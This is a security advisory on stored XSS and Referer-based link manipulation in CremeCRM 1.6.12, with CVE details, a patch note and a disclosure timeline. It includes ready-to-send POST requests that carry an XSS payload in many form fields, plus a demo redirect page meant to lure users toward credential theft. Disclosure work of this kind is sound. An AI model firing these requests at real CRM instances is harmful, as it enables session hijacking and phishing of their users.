CremeCRM 1.6.12 - Multiple Vulnerabilities


CremeCRM Advisory Summary

Product Description

CremeCRM is an open-source CRM. It allows organizations to manage business data concerning customers, invoices, orders, and products. Its official website is www.cremecrm.com, and its source code can be obtained from bitbucket.org/hybrid/. Version 1.6.12 was released on July 28, 2017.

Vulnerabilities List

Two vulnerabilities were identified within the CremeCRM web application:

  • 29 instances of stored cross-site scripting
  • One instance of reflected link manipulation

These vulnerabilities are described in the following sections.

Affected Version

Version 1.6.12

Solution

Update to version 1.8.0


CremeCRM 1.6.12 Vulnerabilities

Stored Cross-Site Scripting

The CremeCRM web application contains 29 stored cross-site scripting (XSS) instances spread across three features. The injected payloads are stored in the application database and execute as JavaScript each time a client visits an infected page. A user account is required to trigger these instances.

Vulnerability Details

CVE ID: CVE-2018-9283, CVE-2018-14396, CVE-2018-14397

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


Stored Cross-site Scripting On Contact Creation Page (CVE-2018-9283)

Ten XSS instances are located in the contact creation and modification page. By injecting a JavaScript payload into the weak parameters of the vulnerable page, an attacker can use these instances to manipulate user sessions. The weak parameters are firstname, lastname, billing_address-address, billing_address-zipcode, billing_address-city, billing_address-department, shipping_address-address, shipping_address-zipcode, shipping_address-city, and shipping_address-department. A billing or shipping address must be defined to trigger the vulnerability. To demonstrate the attack, the following payload can be used for each parameter:

</script><script>alert(document.domain)</script>

The request below could be used to exploit the instances:

POST /persons/contact/add HTTP/1.1
Host: HOST
Cookie: csrftoken=CSRFTOKEN1; sessionid=SESSIONID

csrfmiddlewaretoken=CSRFTOKEN2&cancel_url=http%3A%2F%2FHOST%2Fcreme_config%2Fmy_settings%2F&user=1&civility=&last_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Flastname%2F%29%3C%2Fscript%3E&first_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Ffirstname%2F%29%3C%2Fscript%3E&description=&position=&full_position=&sector=&birthday=&image=&skype=&phone=&mobile=&fax=&email=&url_site=&billing_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingAddress%2F%29%3C%2Fscript%3E&billing_address-po_box=&billing_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingzipcode%2F%29%3C%2Fscript%3E&billing_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingCity%2F%29%3C%2Fscript%3E&billing_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingDepartement%2F%29%3C%2Fscript%3E&billing_address-state=&billing_address-country=&shipping_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingAddress%2F%29%3C%2Fscript%3E&shipping_address-po_box=&shipping_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingzipcode%2F%29%3C%2Fscript%3E&shipping_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingCity%2F%29%3C%2Fscript%3E&shipping_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingDepartement%2F%29%3C%2Fscript%3E&shipping_address-state=&shipping_address-country=


Stored Cross-Site Scripting on Salesman Page (CVE-2018-14396)

Ten XSS instances are located in the salesman creation and modification page. By injecting a JavaScript payload, an attacker can use these instances to manipulate user sessions. The weak parameters are firstname, lastname, billing_address-address, billing_address-zipcode, billing_address-city, billing_address-department, shipping_address-address, shipping_address-zipcode, shipping_address-city, and shipping_address-department. A billing or shipping address must be defined to trigger the vulnerability. To demonstrate the attack, the following payload can be used for each parameter:

</script><script>alert(document.domain)</script>

The request below could be used to exploit the instances:

POST /commercial/salesman/add HTTP/1.1
Host: HOST
Cookie: csrftoken=CSRFTOKEN1; sessionid=SESSIONID

csrfmiddlewaretoken=CSRFTOKEN2&cancel_url=http%3A%2F%2FHOST%2Fcreme_config%2Fmy_settings%2F&user=1&civility=&last_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Flastname%2F%29%3C%2Fscript%3E&first_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Ffirstname%2F%29%3C%2Fscript%3E&description=&position=&full_position=&sector=&birthday=&image=&skype=&phone=&mobile=&fax=&email=&url_site=&billing_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingAddress%2F%29%3C%2Fscript%3E&billing_address-po_box=&billing_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingzipcode%2F%29%3C%2Fscript%3E&billing_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingCity%2F%29%3C%2Fscript%3E&billing_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingDepartement%2F%29%3C%2Fscript%3E&billing_address-state=&billing_address-country=&shipping_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingAddress%2F%29%3C%2Fscript%3E&shipping_address-po_box=&shipping_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingzipcode%2F%29%3C%2Fscript%3E&shipping_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingCity%2F%29%3C%2Fscript%3E&shipping_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingDepartement%2F%29%3C%2Fscript%3E&shipping_address-state=&shipping_address-country=

Stored Cross-site Scripting On Organization Page (CVE-2018-14397)

Nine XSS vulnerabilities are located in the organization creation and modification page. By injecting a JavaScript payload, an attacker can use these instances to manipulate user sessions. The weak parameters are name, billing_address-address, billing_address-zipcode, billing_address-city, billing_address-department, shipping_address-address, shipping_address-zipcode, shipping_address-city, and shipping_address-department. A billing or shipping address must be defined to trigger the vulnerabilities. To demonstrate the attack, the following payload can be used for each parameter:

</script><script>alert(document.domain)</script>

The request below can be used to exploit the instances:

POST /persons/organisation/add HTTP/1.1
Host: HOST
Cookie: csrftoken=CSRFTOKEN1; sessionid=SESSIONID
Connection: close
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=CSRFTOKEN2&cancel_url=http%3A%2F%2FHOST%2F&user=1&name=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&phone=&fax=&email=&url_site=&sector=&capital=&siren=&naf=&siret=&rcs=&tvaintra=&subject_to_vat=on&legal_form=&staff_size=&annual_revenue=&description=&creation_date=&image=&billing_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingaddress%2F%29%3C%2Fscript%3E&billing_address-po_box=&billing_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingzipcode%2F%29%3C%2Fscript%3E&billing_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingcity%2F%29%3C%2Fscript%3E&billing_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingdepartement%2F%29%3C%2Fscript%3E&billing_address-state=&billing_address-country=&shipping_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingaddress%2F%29%3C%2Fscript%3E&shipping_address-po_box=&shipping_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingzipcode%2F%29%3C%2Fscript%3E&shipping_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingcity%2F%29%3C%2Fscript%3E&shipping_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingdepartement%2F%29%3C%2Fscript%3E&shipping_address-state=&shipping_address-country=shipping_address-state=&shipping_address-country=
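A payload that opens with </script> works whether the stored value lands in HTML body text or inside an inline script block; the second case is the one HTML-entity escaping alone does not cover. The following is an added example, not CremeCRM's code: it contrasts the raw-JSON pattern with script-context escaping, using the advisory's payload and the first_name/last_name field names from the request above as constructed input.

```python
import html
import json

# Constructed test input: the payload quoted in the advisory above.
PAYLOAD = "</script><script>alert(document.domain)</script>"


def escape_html_text(value: str) -> str:
    """Escape a value destined for an HTML text or attribute context."""
    return html.escape(value, quote=True)


def escape_for_inline_script(value) -> str:
    """Serialise a value for embedding inside an inline <script> block.

    HTML entity escaping is the wrong tool here: the HTML parser ends an
    inline script at the first '</script' it sees, whatever the JavaScript
    string quoting around it. Encoding '<', '>' and '&' as JavaScript
    unicode escapes removes that terminator while the JSON still decodes
    to the original string (the approach Django's json_script filter uses).
    """
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def decodes_back(value) -> bool:
    """The escaped form must still parse back to the original value."""
    return json.loads(escape_for_inline_script(value)) == value


def render_contact_script_unsafe(first_name: str, last_name: str) -> str:
    """Vulnerable pattern: raw JSON dropped into an inline script."""
    data = {"first_name": first_name, "last_name": last_name}
    return "<script>var contact = " + json.dumps(data) + ";</script>"


def render_contact_script(first_name: str, last_name: str) -> str:
    """Hardened pattern: the same data, script-context escaped."""
    data = {"first_name": first_name, "last_name": last_name}
    return "<script>var contact = " + escape_for_inline_script(data) + ";</script>"


def script_block_intact(markup: str) -> bool:
    """True when the markup still holds exactly one <script>...</script> pair."""
    lowered = markup.lower()
    return lowered.count("<script") == 1 and lowered.count("</script") == 1
```

With the payload as first_name, render_contact_script_unsafe yields a second script element (the browser runs the attacker's code), while render_contact_script keeps a single intact block.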

Reflected Link Manipulation

The CremeCRM web application is vulnerable to reflected link manipulation. This vulnerability allows an attacker to manipulate the URL used by the application when an action is canceled.

Vulnerability Details

CVE ID: CVE-2018-14398

Access Vector: Remote

Security Risk: Medium

Vulnerability: CWE-73

CVSS Base Score: 4.3

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

An attacker can exploit this vulnerability by luring a user to a malicious website, which then sends the user to a creation or modification page of the targeted CremeCRM application (e.g., the contact or salesman page). Because the Cancel button link is built from the HTTP Referer header, a user who clicks Cancel is sent back to the malicious website. That website can detect the returning user and serve a fake CremeCRM authentication page in order to steal their credentials. This attack requires the victim to already be authenticated for the attacker to interact with them.

The code below is an example of a malicious website that could be used to demonstrate the vulnerability:

<html>
<head>
<title>Link manipulation</title>
</head>
<body>
<script>
    // Matches a Referer coming from the targeted CremeCRM instance (HOST).
    var expression = /http:\/\/HOST/gi;
    var ref = document.referrer;
    if (ref.match(expression)) {
        // The visitor came back via the Cancel button: the redirect worked.
        document.write('Malicious website');
    } else {
        // First visit: send the user to a CremeCRM creation form.
        document.write('<a href="http://HOST/billing/sales_order/add">Click here</a>');
    }
</script>
</body>
</html>

By following the link given by the malicious website, the user arrives on an edit form of the application (in the example above, the sales order creation form). The Cancel button will use the HTTP Referer header:

[Screenshot: the Cancel button on the sales order form, linking to the value of the HTTP Referer header]

If the user clicks on the Cancel button, they will be redirected to the malicious page.
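The defensive fix for this class of issue (CWE-73) is to accept a Referer or cancel_url value only when it points back into the application, and otherwise fall back to a fixed in-application page. The following is an added example, not CremeCRM's code; it assumes the deployment host crm.example in place of the advisory's HOST placeholder.

```python
from urllib.parse import urlsplit

# Assumed deployment host for the examples; the advisory writes it as HOST.
APP_HOST = "crm.example"


def safe_cancel_url(candidate, allowed_host=APP_HOST, default="/"):
    """Return candidate only if it leads back into the application itself.

    Anything else (other hosts, protocol-relative '//host' forms, non-HTTP
    schemes, userinfo tricks such as 'host@evil', backslashes that browsers
    turn into slashes) falls back to a fixed in-application page.
    Port numbers are not compared; add that if the deployment needs it.
    """
    if not candidate:
        return default
    candidate = candidate.strip()
    # Control characters and backslashes are parsed inconsistently across
    # URL parsers and browsers, so they never pass.
    if "\\" in candidate or any(ord(ch) < 0x20 for ch in candidate):
        return default
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return default
    if not parts.scheme and not parts.netloc:
        # Site-relative path: accept only with a leading slash.
        return candidate if candidate.startswith("/") else default
    if parts.scheme.lower() not in ("http", "https"):
        return default
    if (parts.hostname or "").lower() != allowed_host.lower():
        return default
    return candidate


def cancel_link(headers, allowed_host=APP_HOST, default="/"):
    """Cancel-button target for a request, from its headers (name-insensitive).

    The vulnerable behaviour uses the Referer value as-is; this filters it.
    """
    referer = next((v for k, v in headers.items() if k.lower() == "referer"), None)
    return safe_cancel_url(referer, allowed_host, default)
```

The csrfmiddlewaretoken field in the requests above marks a Django application; Django ships django.utils.http.url_has_allowed_host_and_scheme for this same check.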

Disclosure Timeline:

  • 10/1/2017: Initial discovery
  • 2/12/2018: Patch published by the vendor
  • 7/19/2018: Vulnerabilities publicly disclosed

Researcher:

Florian Nivette, Security Associate at Bishop Fox 

For Reference:

CVE-2018-9283

CVE-2018-14396

CVE-2018-14397

CVE-2018-14398


About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.
